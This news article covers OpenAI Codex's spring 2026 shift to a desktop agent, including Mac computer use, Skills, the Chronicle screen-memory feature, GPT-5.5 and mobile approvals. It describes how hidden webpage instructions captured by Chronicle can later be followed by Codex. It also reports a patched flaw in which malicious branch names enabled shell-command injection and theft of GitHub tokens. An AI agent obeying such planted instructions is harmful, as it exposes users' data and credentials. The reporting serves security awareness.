OpenAI Codex Becomes Desktop Agent: Controls Mac Apps, Watches Screen, Runs on Mobile

In six weeks this spring, OpenAI turned Codex from a sandboxed code-runner into a desktop agent that operates Mac applications with its own cursor, captures your screen to build ambient memory, executes tasks on a schedule, and now follows you to your phone. The transformation unfolded across three major updates — April 16, April 20, and May 14 — and the product most of the platform's more than 4 million weekly developers knew as recently as March is no longer the one they are using today.

OpenAI Codex Crossed From Sandboxed Tool to Desktop Agent in April

The original Codex, introduced as a research preview in May 2025, was deliberately bounded: it ran inside an isolated cloud sandbox, operated on copies of a user's code, and had no access to the local desktop or other applications. That boundary no longer exists. On April 16, OpenAI released what it called "Codex for (almost) everything," adding computer-use capabilities that let the agent operate a Mac's mouse and keyboard inside any application — not just those with APIs — alongside local file access, an in-app browser, and image generation through GPT Image 1.5.

The agent now runs multiple background tasks simultaneously without interrupting the user's foreground work. It can navigate a third-party application to test a user interface, switch into a browser session to fetch and inspect a webpage, or install and run one of more than 90 new plugins from a catalog that includes Atlassian Rovo for Jira management, CircleCI, CodeRabbit, GitLab Issues, the Microsoft Suite, Neon by Databricks, Remotion for programmatic video, Render, and Superpowers. Each plugin pairs a reusable instruction-and-script bundle — OpenAI calls these Skills — with an app-specific connector built on the Model Context Protocol standard. Skills can also be built by users themselves; community-authored examples include scraping YouTube transcripts, generating Excalidraw diagrams, and auto-deploying mobile apps to public test URLs. Skills can run on daily or weekly automated schedules — the closest any consumer AI product has come to a natural-language personal cron job.

What Is Codex Chronicle and What Privacy Risks Does It Carry?

Four days after the April 16 update, OpenAI introduced Chronicle — the feature drawing the most independent security commentary. According to OpenAI's developer documentation, Chronicle runs sandboxed background agents that periodically capture screenshots of the user's screen, extract text via optical character recognition, and summarize selected frames into text-based memories stored as Markdown files on the user's device. When a user later asks Codex something like "fix this" or "continue what I was working on yesterday," the agent reads those stored memories to resolve the reference without requiring the user to re-explain context.

The design is intentionally framed as an answer to a real problem: AI tools that require restating context in every session. But OpenAI's own documentation lists the trade-offs with unusual directness. The feature "uses rate limits quickly, increases risk of prompt injection, and stores memories unencrypted on your device." Selected screenshot frames are processed through OpenAI's servers to generate memories; OpenAI says it does not retain the screenshots after processing unless required by law. Screen captures older than six hours are automatically deleted while the feature is active. The locally stored Markdown memory files, however, are accessible to other applications running on the machine, as the developer documentation confirms.

The prompt injection risk is not theoretical. Chronicle reads everything on screen at the time of capture — including webpages. If a user browses a page containing hidden or disguised instructions, Codex may follow those instructions the next time it reads that memory, according to OpenAI's own documentation. OpenAI recommends pausing Chronicle before meetings or when viewing sensitive material — an acknowledgment that the feature will capture things it should not, with the management burden placed on the user.

Multiple security outlets drew explicit comparisons to Microsoft's Recall, a Windows feature that also captured periodic screenshots and faced sustained criticism from the security community in 2024. Chronicle's restricted rollout — available only to ChatGPT Pro subscribers on Apple Silicon Macs, with access blocked in the European Union, United Kingdom, and Switzerland — reflects unresolved regulatory questions that OpenAI has not yet publicly answered in detail.

GPT-5.5 Becomes Codex Default With Record Agentic Coding Benchmark

Underlying the April updates is a new model. OpenAI announced GPT-5.5 on April 23 and made it available in the API on April 24, positioning it as the recommended default for most Codex tasks while keeping GPT-5.4 available as an alternative. On Terminal-Bench 2.0, which tests complex command-line workflows requiring planning, iteration, and tool coordination, GPT-5.5 achieved 82.7% accuracy — OpenAI's highest agentic-coding benchmark score to date. Michael Truell, co-founder and chief executive of Cursor, said the model is "noticeably smarter and more persistent than GPT-5.4, with stronger coding performance and more reliable tool use" and "stays on task for significantly longer without stopping early."

GPT-5.5 supports a one-million-token context window in the API and a 400,000-token window in Codex. OpenAI says the model completes the same Codex tasks with fewer tokens than GPT-5.4, offsetting its higher per-token price for most users.

Codex Mobile App Turns Your Phone Into Remote Control for Running Agent Tasks

The third major update, released May 14 as a preview for all ChatGPT plans including the free tier, does not run code on the phone. The ChatGPT mobile app instead displays a live view of Codex sessions executing on the user's paired desktop or remote development environment: terminal output, file diffs, screenshots from the desktop browser session, and the agent's pending approval requests. Users can approve or reject specific commands, switch between GPT-5.4 and GPT-5.5 mid-run, and start new projects from their phones. All sensitive material — credentials, files, local environment settings — remains on the host machine; only outputs and approval requests cross the wire. Windows support is listed as coming soon; the mobile integration currently requires the Codex desktop app on macOS.

The practical effect: a developer can start a multi-hour refactor at the office, leave, and approve commits, reject a specific change, or answer an ambiguity question from a restaurant. OpenAI describes this as enabling "a new rhythm for collaboration" in which long-running autonomous agent tasks pause only when human judgment is needed.

How Does OpenAI Codex Work as an AI Coding Agent?

To understand the significance of these updates, it helps to know what Codex was and where the new boundary sits. From its May 2025 launch through early 2026, the product's defining characteristic was containment: tasks ran in isolated cloud sandboxes preloaded with the user's codebase, the agent could not reach the internet during execution by default, and nothing touched the local desktop. A user prompted, Codex executed in a container, and results came back as diffs and test logs for human review.

The April updates relocated that boundary. Codex now has local file access and can operate any Mac application directly. It can open a browser, click through a web interface, inspect a live application, and generate an image — all within a single task. The plugin ecosystem extends its reach into third-party services. Chronicle reaches beyond active prompts into ambient activity. The mobile integration moves the approval loop off the desktop entirely.

Security researchers at BeyondTrust's Phantom Labs documented what happens when the boundaries of a live-execution environment are not policed carefully: in December 2025, researcher Tyler Jespersen found that Codex passed GitHub branch names directly into shell commands without sanitization. An attacker could embed malicious commands in a branch name and retrieve a victim's GitHub authentication token in cleartext, with potential read/write access to the entire codebase. OpenAI patched the vulnerability on February 5, 2026. Check Point Research's Eli Smadja summarized the lesson: "Don't assume AI tools are secure by default." The new computer-use and Chronicle capabilities create a meaningfully larger attack surface than the sandboxed product those vulnerabilities were found in.

What This Changes for Developers and Non-Developers

Three groups feel the update most directly. Software developers now have a coding agent that can handle long multi-step tasks without requiring continuous human supervision — and can hand off approval decisions to a phone rather than a laptop. Knowledge workers who would not previously have described themselves as developers can author Skills that run on automated schedules: generating a weekly digest, populating a spreadsheet from online sources, or drafting visual diagrams, without writing code in the traditional sense. Users who want an assistant that retains context across sessions get, in Chronicle, a solution that carries real privacy trade-offs they need to weigh before enabling.

None of these capabilities — the mobile integration, Chronicle, or the plugin ecosystem at scale — have been stress-tested in the kinds of long-horizon production environments where failure modes become visible. The shape of what Codex is becoming is now clear. What it does to how people actually work, and whether its security posture holds at scale, will take longer to establish.

Frequently Asked Questions

What does OpenAI Codex's Chronicle feature do?

Chronicle is an opt-in feature that runs background agents to capture periodic screenshots of the user's screen, extract text, and build persistent memories stored as Markdown files on the device. When users ask Codex to continue a task or reference something they were working on, Codex reads those memories instead of requiring the user to re-explain context. The feature is currently available only to ChatGPT Pro subscribers on Apple Silicon Macs and is not available in the EU, UK, or Switzerland.

Is OpenAI Codex safe to use as a desktop AI agent?

Codex's expanded capabilities create a larger security surface than the original sandboxed product. OpenAI's own documentation warns that Chronicle increases exposure to prompt injection attacks — malicious instructions embedded in a webpage the user views can enter the memory store and later be executed by Codex. A patched December 2025 vulnerability discovered by BeyondTrust showed that Codex's execution environment could be exploited to steal GitHub authentication tokens via maliciously crafted branch names. OpenAI has addressed that specific flaw, but security researchers advise treating any AI live-execution environment as a privileged system requiring careful governance.

Can I use OpenAI Codex on my phone?

Yes. As of May 14, 2026, Codex is available in preview inside the ChatGPT mobile app on iOS and Android across all plans, including the free tier. The phone functions as a remote control: it displays live output from a Codex session running on a paired Mac, lets users approve or reject commands, and allows starting new tasks, but does not execute code locally on the phone. Windows desktop support is listed as coming soon.

What is GPT-5.5 and how does it improve Codex?

GPT-5.5 is OpenAI's latest frontier model, released April 23, 2026, and the new recommended default for most Codex tasks. On Terminal-Bench 2.0, it scored 82.7% — the highest agentic-coding benchmark result OpenAI has published. The model supports a one-million-token context window in the API and completes Codex tasks with fewer tokens than its predecessor GPT-5.4, which partially offsets its higher per-token price.

Tags:OpenAI

Join the Discussion

OpenAI Codex Becomes Desktop Agent: Controls Mac Apps, Watches Screen, Runs on Mobile

What does OpenAI Codex’s new Chronicle feature do, and should you enable it?

OpenAI Codex Crossed From Sandboxed Tool to Desktop Agent in April

What Is Codex Chronicle and What Privacy Risks Does It Carry?

GPT-5.5 Becomes Codex Default With Record Agentic Coding Benchmark

Codex Mobile App Turns Your Phone Into Remote Control for Running Agent Tasks

How Does OpenAI Codex Work as an AI Coding Agent?

What This Changes for Developers and Non-Developers

Frequently Asked Questions

Oura Ring 5 Leak Hints at May 28 Launch on Top of Lighter Design, Optimized Battery, More

Hyundai Commits 25,000 Atlas Robots to Own Factories: Union Blocks Deployment Without Labor Deal

Best Portable Bluetooth Speakers in 2026: Top Picks for Sound, Battery Life, and Durability

Apple's Unexpected iPhone 18 Pro Max Camera Upgrade That Could Change Mobile Photography

Warhorse Studios Confirms Middle-earth RPG: Kingdom Come's Gritty Open-World Formula Targets Tolkien